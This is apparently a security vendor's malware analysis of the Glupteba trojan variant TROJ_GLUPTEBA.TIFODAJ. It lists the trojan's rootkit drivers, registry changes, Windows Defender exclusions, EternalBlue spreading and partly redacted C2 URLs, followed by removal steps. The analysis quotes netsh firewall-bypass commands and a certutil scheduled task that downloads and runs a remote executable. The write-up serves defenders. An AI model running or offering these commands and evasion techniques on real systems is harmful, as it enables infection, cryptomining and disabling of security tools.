TROJ_GLUPTEBA.TIFODAJ

 Analysis by: John Anthony Banes

 PLATFORM:

Windows

 OVERALL RISK RATING:
 DAMAGE POTENTIAL:
 DISTRIBUTION POTENTIAL:
 REPORTED INFECTION:
 INFORMATION EXPOSURE:

  • Threat Type: Trojan

  • Destructiveness: No

  • Encrypted: Yes

  • In the wild: Yes

  OVERVIEW

Infection Channel:

Dropped by other malware

This Trojan arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.

It connects to certain websites to send and receive information.

  TECHNICAL DETAILS

File Size:

3,171,328 bytes

File Type:

EXE

Memory Resident:

Yes

Initial Samples Received Date:

28 Jun 2018

Payload:

Connects to URLs/IPs, Drops files

Arrival Details

This Trojan arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.

Installation

This Trojan drops the following component file(s):

  • %System%\drivers\winmon.sys - rootkit, hides processes.
  • %System%\drivers\WinmonFS.sys - rootkit, hides files and folders.
  • %System%\drivers\WinmonProcessMonitor.sys - rootkit, finds specific processes and closes them.

(Note: %System% is the Windows system folder, where it usually is C:\Windows\System32 on all Windows operating system versions.)

It drops the following copies of itself into the affected system:

  • %Windows%\rss\csrss.exe

(Note: %Windows% is the Windows folder, where it usually is C:\Windows on all Windows operating system versions.)

It creates the following folders:

  • %User Temp%\csrss
  • %Windows%\rss

(Note: %User Temp% is the user's temporary folder, where it usually is C:\Documents and Settings\{user name}\Local Settings\Temp on Windows 2000, Windows Server 2003, and Windows XP (32- and 64-bit); C:\Users\{user name}\AppData\Local\Temp on Windows Vista (32- and 64-bit), Windows 7 (32- and 64-bit), Windows 8 (32- and 64-bit), Windows 8.1 (32- and 64-bit), Windows Server 2008, and Windows Server 2012.. %Windows% is the Windows folder, where it usually is C:\Windows on all Windows operating system versions.)

It adds the following mutexes to ensure that only one of its copies runs at any one time:

  • Global\h48yorbq6rm87zot

It terminates the execution of the copy it initially executed and executes the copy it drops instead.

Autostart Technique

This Trojan adds the following registry entries to enable its automatic execution at every system startup:

HKEY_CURRENT_USER\Software\Microsoft\
Windows\CurrentVersion\Run
{random name} = %Windows%\rss\csrss.exe

Other System Modifications

This Trojan adds the following registry keys:

HKEY_CURRENT_USER\Software\Microsoft\
TestApp

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\
services\Winmon

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\
services\Winmon\Security

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\
services\WinmonFS

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\
services\WinmonFS\Instances

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\
services\WinmonFS\Instances\
WinmonFS

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\
services\WinmonFS\Security

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\
services\WinmonProcessMonitor

It adds the following registry entries:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\
services\Winmon
DisplayName = Winmon

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\
services\Winmon
ErrorControl = 0

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\
services\Winmon
Start = 3

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\
services\Winmon
Type = 1

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\
services\Winmon\Security
Security = {hex values}

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\
services\WinmonFS
DependOnService = FltMgr

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\
services\WinmonFS
DisplayName = WinmonFS

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\
services\WinmonFS
ErrorControl = 0

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\
services\WinmonFS
Group = FSFilter Activity Monitor

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\
services\WinmonFS
ImagePath = \??\%System%\drivers\WinmonFS.sys

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\
services\WinmonFS
Start = 3

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\
services\WinmonFS
Type = 2

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\
services\WinmonFS\Instances
DefaultInstance = WinmonFS

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\
services\WinmonFS\Instances\
WinmonFS
Altitude = 370000

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\
services\WinmonFS\Instances\
WinmonFS
Flags = 0

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\
services\WinmonFS\Security
Security = {hex values}

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\
services\Winmon
ImagePath = \??\%System%\drivers\Winmon.sys

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\
services\WinmonProcessMonitor
DisplayName = WinmonProcessMonitor

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\
services\WinmonProcessMonitor
ErrorControl = 0

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\
services\WinmonProcessMonitor
ImagePath = \??\{hex values}\drivers\WinmonProcessMonitor.sys

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\
services\WinmonProcessMonitor
Start = 1

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\
services\WinmonProcessMonitor
Type = 1

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\
Windows Defender\Exclusions\Paths
%Windows% = 0

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\
Windows Defender\Exclusions\Paths
%Windows%\rss = 0

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\
Windows Defender\Exclusions\Paths
%Application Data%\EpicNet Inc\CloudNet = 0

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\
Windows Defender\Exclusions\Paths
%User Temp%\csrss = 0

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\
Windows Defender\Exclusions\Paths
%Application Data%\PatientVoice = 0

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\
Windows Defender\Exclusions\Paths
%Windows%\windefender.exe = 0

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\
Windows Defender\Exclusions\Paths
%User Temp%\wup = 0

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\
Windows Defender\Exclusions\Paths
%System%\drivers = 0

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\
Windows Defender\Exclusions\Processes
csrss.exe = 0

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\
Windows Defender\Exclusions\Processes
cloudnet.exe = 0

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\
Windows Defender\Exclusions\Processes
windefender.exe = 0

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\
Windows Defender\Exclusions\Processes
{malware filename} = 0

HKEY_CURRENT_USER\Software\Microsoft\
TestApp
Name = {random}

HKEY_CURRENT_USER\Software\Microsoft\
TestApp
Defender = {string}

HKEY_CURRENT_USER\Software\Microsoft\
TestApp
Servers = https://{BLOCKED}mmute.com, https://{BLOCKED}acon.com

HKEY_CURRENT_USER\Software\Microsoft\
TestApp
UUID = {value}

HKEY_CURRENT_USER\Software\Microsoft\
TestApp
Command = {value}

HKEY_CURRENT_USER\Software\Microsoft\
TestApp
FirstInstallDate = {value}

HKEY_CURRENT_USER\Software\Microsoft\
TestApp
CloudnetSource = {string}

HKEY_CURRENT_USER\Software\Microsoft\
TestApp
ServiceVersion = {string}

HKEY_CURRENT_USER\Software\Microsoft\
TestApp
SC = {value}

HKEY_CURRENT_USER\Software\Microsoft\
TestApp
PGDSE = {value]

HKEY_CURRENT_USER\Software\Microsoft\
TestApp
VC = {value}

HKEY_CURRENT_USER\Software\Microsoft\
TestApp
OSCaption = {Operating System of affected machine}

HKEY_CURRENT_USER\Software\Microsoft\
TestApp
OSArchitecture = {32 or 64}

HKEY_CURRENT_USER\Software\Microsoft\
TestApp
IsAdmin = {value}

HKEY_CURRENT_USER\Software\Microsoft\
TestApp
AV = {strings}

HKEY_CURRENT_USER\Software\Microsoft\
TestApp
PatchTime = {value}

HKEY_CURRENT_USER\Software\Microsoft\
TestApp
CPU = {CPU details of affected machine}

HKEY_CURRENT_USER\Software\Microsoft\
TestApp
GPU = {GPU details of affected machine}

HKEY_CURRENT_USER\Software\Microsoft\
TestApp
Firewall = {string}

Download Routine

This Trojan connects to the following URL(s) to download its component file(s):

  • http://{BLOCKED}mmer.{BLOCKED}/app/deps.zip - EternalBlue/DoublePulsar components
  • http://dp.{BLOCKED}dcoolest.{BLOCKED}/scheduled.exe - Updated copy of itself
  • http://{BLOCKED}mmer.{BLOCKED}/app/app.exe - Updated copy of itself
  • http://{BLOCKED}mmer.{BLOCKED}/app/vc.exe - Downloads browser credential stealer
  • http://{BLOCKED}mmer.{BLOCKED}/app/watchdog.exe - Downloader for another TROJ_GLUPTEBA malware
  • http://{BLOCKED}tner.{BLOCKED}/cloudnet.exe

It saves the files it downloads using the following names:

  • EternalBlue\DoublePulsar files are extracted and saved as:
    • %User Temp%\csrss\smb\adfw-2.dll
    • %User Temp%\csrss\smb\adfw.dll
    • %User Temp%\csrss\smb\cnli-0.dll
    • %User Temp%\csrss\smb\cnli-1.dll
    • %User Temp%\csrss\smb\coli-0.dll
    • %User Temp%\csrss\smb\crli-0.dll
    • %User Temp%\csrss\smb\dmgd-1.dll
    • %User Temp%\csrss\smb\dmgd-4.dll
    • %User Temp%\csrss\smb\Doublepulsar-1.3.1.exe
    • %User Temp%\csrss\smb\esco-0.dll
    • %User Temp%\csrss\smb\Eternalblue-2.2.0.exe
    • %User Temp%\csrss\smb\exma-1.dll
    • %User Temp%\csrss\smb\exma.dll
    • %User Temp%\csrss\smb\iconv.dll
    • %User Temp%\csrss\smb\libcurl.dll
    • %User Temp%\csrss\smb\libeay32.dll
    • %User Temp%\csrss\smb\libiconv-2.dll
    • %User Temp%\csrss\smb\libxml2.dll
    • %User Temp%\csrss\smb\payload32.dll
    • %User Temp%\csrss\smb\payload64.dll
    • %User Temp%\csrss\smb\pcla-0.dll
    • %User Temp%\csrss\smb\pcre-0.dll
    • %User Temp%\csrss\smb\pcrecpp-0.dll
    • %User Temp%\csrss\smb\pcreposix-0.dll
    • %User Temp%\csrss\smb\posh-0.dll
    • %User Temp%\csrss\smb\posh.dll
    • %User Temp%\csrss\smb\pytrch.py
    • %User Temp%\csrss\smb\pytrch.pyc
    • %User Temp%\csrss\smb\riar-2.dll
    • %User Temp%\csrss\smb\riar.dll
    • %User Temp%\csrss\smb\ssleay32.dll
    • %User Temp%\csrss\smb\tibe-1.dll
    • %User Temp%\csrss\smb\tibe-2.dll
    • %User Temp%\csrss\smb\tibe.dll
    • %User Temp%\csrss\smb\trch-0.dll
    • %User Temp%\csrss\smb\trch-1.dll
    • %User Temp%\csrss\smb\trch.dll
    • %User Temp%\csrss\smb\trfo-0.dll
    • %User Temp%\csrss\smb\trfo-2.dll
    • %User Temp%\csrss\smb\trfo.dll
    • %User Temp%\csrss\smb\tucl-1.dll
    • %User Temp%\csrss\smb\tucl.dll
    • %User Temp%\csrss\smb\ucl.dll
    • %User Temp%\csrss\smb\xdvl-0.dll
    • %User Temp%\csrss\smb\zibe.dll
    • %User Temp%\csrss\smb\zlib1.dll
    • %User Temp%\csrss\smb\_pytrch.pyd
  • %User Temp%\csrss\cloudnet.exe
  • %User temp%\csrss\vc.exe
  • %Windows%\windefender.exe

(Note: %User Temp% is the user's temporary folder, where it usually is C:\Documents and Settings\{user name}\Local Settings\Temp on Windows 2000, Windows Server 2003, and Windows XP (32- and 64-bit); C:\Users\{user name}\AppData\Local\Temp on Windows Vista (32- and 64-bit), Windows 7 (32- and 64-bit), Windows 8 (32- and 64-bit), Windows 8.1 (32- and 64-bit), Windows Server 2008, and Windows Server 2012.. %Windows% is the Windows folder, where it usually is C:\Windows on all Windows operating system versions.)

Other Details

This Trojan connects to the following website to send and receive information:

  • https://{DOMAIN}/bots/register
  • https://{DOMAIN}/bots/poll
  • https://{DOMAIN}/bots/update-data
  • https://{DOMAIN}/bots/report-install
  • https://{DOMAIN}/bots/log
  • https://{DOMAIN}/bots/report
  • https://{BLOCKED}mmute.{BLOCKED}/bots/install-failure

It does the following:

  • This malware uses EternalBlue/DoublePulsar components to takes advantage of the following software vulnerabilities to distribute its coinminer component across networks:
    • Microsoft Windows SMB Server (MS17-010) Vulnerability
  • It terminates itself if it detects it is being run in a VMware or VirtualBox environment.
  • It executes the following commands to bypass Windows Firewall:
    netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="%Windows%\rss\csrss.exe" enable=yes
    netsh advfirewall firewall add rule name="CloudNet" dir=in action=allow program="%Application Data%\EpicNet Inc\CloudNet\cloudnet.exe" enable=yes
  • It connects to the following website to download a miner and its configuration file:
    https://{DOMAIN}.com/bots/check?uuid={UUID}
    https://{DOMAIN}.com/bots/checkv?uuid={UUID}
    The downloaded coinminer component is saved as:
    %User temp%\wup\wup.exe
    %User temp%\wup\wupv.exe
  • It disables Windows Update services by modifying the following registry entry:
    HKEY_LOCAL_MACHINE\CurrentControlSet\services\wuauserv
    value = Start
    data = 4

It adds the following scheduled tasks:

  • Task Name: csrss
    Schedule: At log on of any user
    Task to be run: %Windows%\rss\csrss.exe
  • Task Name: ScheduledUpdate
    Schedule: At log on of any user
    Task to be run: cmd.exe /C certutil.exe -urlcache -split -f http://{BLOCKED}.com/app/app.exe %User Temp%\csrss\scheduled.exe && %User Temp%\csrss\scheduled.exe /31340

NOTES:

The value {DOMAIN} can be one of the following below:

{BLOCKED}mmute.{BLOCKED}

{BLOCKED}acon.{BLOCKED}

  SOLUTION

Minimum Scan Engine:

9.850

FIRST VSAPI PATTERN FILE:

14.346.05

FIRST VSAPI PATTERN DATE:

28 Jun 2018

VSAPI OPR PATTERN File:

14.347.00

VSAPI OPR PATTERN Date:

29 Jun 2018

Step 1

Before doing any scans, Windows XP, Windows Vista, and Windows 7 users must disable System Restore to allow full scanning of their computers.

Step 2

Note that not all files, folders, and registry keys and entries are installed on your computer during this malware's/spyware's/grayware's execution. This may be due to incomplete installation or other operating system conditions. If you do not find the same files/folders/registry information, please proceed to the next step.

Step 3

Restart in Safe Mode

[ Learn More ]

Step 4

Delete this registry key

[ Learn More ]

Important: Editing the Windows Registry incorrectly can lead to irreversible system malfunction. Please do this step only if you know how or you can ask assistance from your system administrator. Else, check this Microsoft article first before modifying your computer's registry.

  • In HKEY_CURRENT_USER\Software\Microsoft
    • TestApp
  • In HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services
    • Winmon
  • In HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Winmon
    • Security
  • In HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services
    • WinmonFS
  • In HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\WinmonFS
    • Instances
  • In HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\WinmonFS\Instances
    • WinmonFS
  • In HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\servicesWinmonFS
    • Security
  • In HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services
    • WinmonProcessMonitor

Step 5

Delete this registry value

[ Learn More ]

Important: Editing the Windows Registry incorrectly can lead to irreversible system malfunction. Please do this step only if you know how or you can ask assistance from your system administrator. Else, check this Microsoft article first before modifying your computer's registry.

  • In HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Winmon
    • DisplayName = Winmon
  • In HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Winmon
    • ErrorControl = 0
  • In HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Winmon
    • ImagePath = \??\%System%\drivers\Winmon.sys
  • In HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Winmon
    • Start = 3
  • In HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Winmon
    • Type = 1
  • In HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Winmon\Security
    • Security = {hex values}
  • In HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\WinmonFS
    • DependOnService = FltMgr
  • In HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\WinmonFS
    • DisplayName = WinmonFS
  • In HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\WinmonFS
    • ErrorControl = 0
  • In HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\WinmonFS
    • Group = FSFilter Activity Monitor
  • In HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\WinmonFS
    • ImagePath = \??\%System%\drivers\WinmonFS.sys
  • In HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\WinmonFS
    • Start = 3
  • In HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\WinmonFS
    • Type = 2
  • In HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\WinmonFS\Instances
    • DefaultInstance = WinmonFS
  • In HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\WinmonFS\Instances\WinmonFS
    • Altitude = 370000
  • In HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\WinmonFS\Instances\WinmonFS
    • Flags = 0
  • In HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\WinmonFS\Security
    • Security = {hex values}
  • In HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\WinmonProcessMonitor
    • DisplayName = WinmonProcessMonitor
  • In HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\WinmonProcessMonitor
    • ErrorControl = 0
  • In HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\WinmonProcessMonitor
    • ImagePath = \??\{hex values}\drivers\WinmonProcessMonitor.sys
  • In HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\WinmonProcessMonitor
    • Start = 1
  • In HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\WinmonProcessMonitor
    • Type = 1
  • In HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths
    • %Windows% = 0
  • In HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths
    • %Windows%\rss = 0
  • In HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths
    • %Application Data%\EpicNet Inc\CloudNet = 0
  • In HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths
    • %User Temp%\csrss = 0
  • In HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths
    • %Application Data%\PatientVoice = 0
  • In HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths
    • %Windows%\windefender.exe = 0
  • In HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths
    • %User Temp%\wup = 0
  • In HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths
    • %System%\drivers = 0
  • In HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes
    • csrss.exe = 0
  • In HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes
    • cloudnet.exe = 0
  • In HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes
    • windefender.exe = 0
  • In HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes
    • {malware filename} = 0
  • In HKEY_CURRENT_USER\Software\Microsoft\TestApp
    • Name = {random}
  • In HKEY_CURRENT_USER\Software\Microsoft\TestApp
    • Defender = {string}
  • In HKEY_CURRENT_USER\Software\Microsoft\TestApp
    • Servers = https://{BLOCKED}.com , https://{BLOCKED}.com
  • In HKEY_CURRENT_USER\Software\Microsoft\TestApp
    • UUID = {value}
  • In HKEY_CURRENT_USER\Software\Microsoft\TestApp
    • Command = {value}
  • In HKEY_CURRENT_USER\Software\Microsoft\TestApp
    • FirstInstallDate = {value}
  • In HKEY_CURRENT_USER\Software\Microsoft\TestApp
    • CloudnetSource = {string}
  • In HKEY_CURRENT_USER\Software\Microsoft\TestApp
    • ServiceVersion = {string}
  • In HKEY_CURRENT_USER\Software\Microsoft\TestApp
    • SC = {value}
  • In HKEY_CURRENT_USER\Software\Microsoft\TestApp
    • PGDSE = {value}
  • In HKEY_CURRENT_USER\Software\Microsoft\TestApp
    • VC = {value}
  • In HKEY_CURRENT_USER\Software\Microsoft\TestApp
    • OSCaption = {Operating System of affected machine}
  • In HKEY_CURRENT_USER\Software\Microsoft\TestApp
    • OSArchitecture = {32 or 64}
  • In HKEY_CURRENT_USER\Software\Microsoft\TestApp
    • IsAdmin = {value}
  • In HKEY_CURRENT_USER\Software\Microsoft\TestApp
    • AV = {strings}
  • In HKEY_CURRENT_USER\Software\Microsoft\TestApp
    • PatchTime = {value}
  • In HKEY_CURRENT_USER\Software\Microsoft\TestApp
    • CPU = {CPU details of affected machine}
  • In HKEY_CURRENT_USER\Software\Microsoft\TestApp
    • GPU = {GPU details of affected machine}
  • In HKEY_CURRENT_USER\Software\Microsoft\TestApp
    • Firewall = {string}

Step 6

Restore these modified registry values

[ Learn More ]

Important:Editing the Windows Registry incorrectly can lead to irreversible system malfunction. Please do this only if you know how to or you can seek your system administrator's help. You may also check out this Microsoft article first before modifying your computer's registry.

  • In HKEY_LOCAL_MACHINE\CurrentControlSet\services\wuauserv
    • From: Start = 4
      To: Start = (usually 2)

Step 7

Deleting Scheduled Tasks

The following {Task Name} - {Task to be run} listed should be used in the steps identified below:

  • Task Name: csrss
    Task to be run: %Windows%\rss\csrss.exe
  • Task Name: ScheduledUpdate
    Task to be run: cmd.exe /C certutil.exe -urlcache -split -f http://{BLOCKED}mmer.com/app/app.exe %User Temp%\csrss\scheduled.exe && %User Temp%\csrss\scheduled.exe /31340



For Windows 2000, Windows XP, and Windows Server 2003:

  1. Open the Windows Scheduled Tasks. Click Start>Programs>Accessories>
    System Tools>Scheduled Tasks.
  2. Locate each {Task Name} values listed above in the Name column.
  3. Right-click on the said file(s) with the aforementioned value.
  4. Click on Properties. In the Run field, check for the listed {Task to be run}.
  5. If the strings match the list above, delete the task.

For Windows Vista, Windows 7, Windows Server 2008, Windows 8, Windows 8.1, and Windows Server 2012:

  1. Open the Windows Task Scheduler. To do this:
    • On Windows Vista, Windows 7, and Windows Server 2008, click Start, type taskschd.msc in the Search input field, then press Enter.
    • On Windows 8, Windows 8.1, and Windows Server 2012, right-click on the lower left corner of the screen, click Run, type taskschd.msc, then press Enter.
  2. In the left panel, click Task Scheduler Library.
  3. In the upper-middle panel, locate each {Task Name} values listed above in the Name column.
  4. In the lower-middle panel, click the Actions tab. In the Details column, check for the {Task to be run} string.
  5. If the said string is found, delete the task.

Step 8

Search and delete this file

[ Learn More ]
There may be some files that are hidden. Please make sure you check the Search Hidden Files and Folders checkbox in the "More advanced options" option to include all hidden files and folders in the search result.
  • %System%\drivers\winmon.sys
  • %System%\drivers\WinmonFS.sys
  • %System%\drivers\WinmonProcessMonitor.sys
  • %User temp%\wup\wup.exe
  • %User temp%\wup\wupv.exe
  • %User Temp%\csrss\scheduled.exe
  • %User Temp%\csrss\cloudnet.exe
  • %User temp%\csrss\vc.exe
  • %Windows%\windefender.exe
  • %User Temp%\csrss\smb\adfw-2.dll
  • %User Temp%\csrss\smb\adfw.dll
  • %User Temp%\csrss\smb\cnli-0.dll
  • %User Temp%\csrss\smb\cnli-1.dll
  • %User Temp%\csrss\smb\coli-0.dll
  • %User Temp%\csrss\smb\crli-0.dll
  • %User Temp%\csrss\smb\dmgd-1.dll
  • %User Temp%\csrss\smb\dmgd-4.dll
  • %User Temp%\csrss\smb\Doublepulsar-1.3.1.exe
  • %User Temp%\csrss\smb\esco-0.dll
  • %User Temp%\csrss\smb\Eternalblue-2.2.0.exe
  • %User Temp%\csrss\smb\exma-1.dll
  • %User Temp%\csrss\smb\exma.dll
  • %User Temp%\csrss\smb\iconv.dll
  • %User Temp%\csrss\smb\libcurl.dll
  • %User Temp%\csrss\smb\libeay32.dll
  • %User Temp%\csrss\smb\libiconv-2.dll
  • %User Temp%\csrss\smb\libxml2.dll
  • %User Temp%\csrss\smb\payload32.dll
  • %User Temp%\csrss\smb\payload64.dll
  • %User Temp%\csrss\smb\pcla-0.dll
  • %User Temp%\csrss\smb\pcre-0.dll
  • %User Temp%\csrss\smb\pcrecpp-0.dll
  • %User Temp%\csrss\smb\pcreposix-0.dll
  • %User Temp%\csrss\smb\posh-0.dll
  • %User Temp%\csrss\smb\posh.dll
  • %User Temp%\csrss\smb\pytrch.py
  • %User Temp%\csrss\smb\pytrch.pyc
  • %User Temp%\csrss\smb\riar-2.dll
  • %User Temp%\csrss\smb\riar.dll
  • %User Temp%\csrss\smb\ssleay32.dll
  • %User Temp%\csrss\smb\tibe-1.dll
  • %User Temp%\csrss\smb\tibe-2.dll
  • %User Temp%\csrss\smb\tibe.dll
  • %User Temp%\csrss\smb\trch-0.dll
  • %User Temp%\csrss\smb\trch-1.dll
  • %User Temp%\csrss\smb\trch.dll
  • %User Temp%\csrss\smb\trfo-0.dll
  • %User Temp%\csrss\smb\trfo-2.dll
  • %User Temp%\csrss\smb\trfo.dll
  • %User Temp%\csrss\smb\tucl-1.dll
  • %User Temp%\csrss\smb\tucl.dll
  • %User Temp%\csrss\smb\ucl.dll
  • %User Temp%\csrss\smb\xdvl-0.dll
  • %User Temp%\csrss\smb\zibe.dll
  • %User Temp%\csrss\smb\zlib1.dll
  • %User Temp%\csrss\smb\_pytrch.pyd

Step 9

Search and delete these folders

[ Learn More ]
Please make sure you check the Search Hidden Files and Folders checkbox in the More advanced options option to include all hidden folders in the search result.
  • %User Temp%\csrss
  • %Windows%\rss

Step 10

Restart in normal mode and scan your computer with your Trend Micro product for files detected as TROJ_GLUPTEBA.TIFODAJ. If the detected files have already been cleaned, deleted, or quarantined by your Trend Micro product, no further step is required. You may opt to simply delete the quarantined files. Please check this Knowledge Base page for more information.

Step 11

Download and apply this security patch Refrain from using these products until the appropriate patches have been installed. Trend Micro advises users to download critical patches upon release by vendors.


Did this description help? Tell us how we did.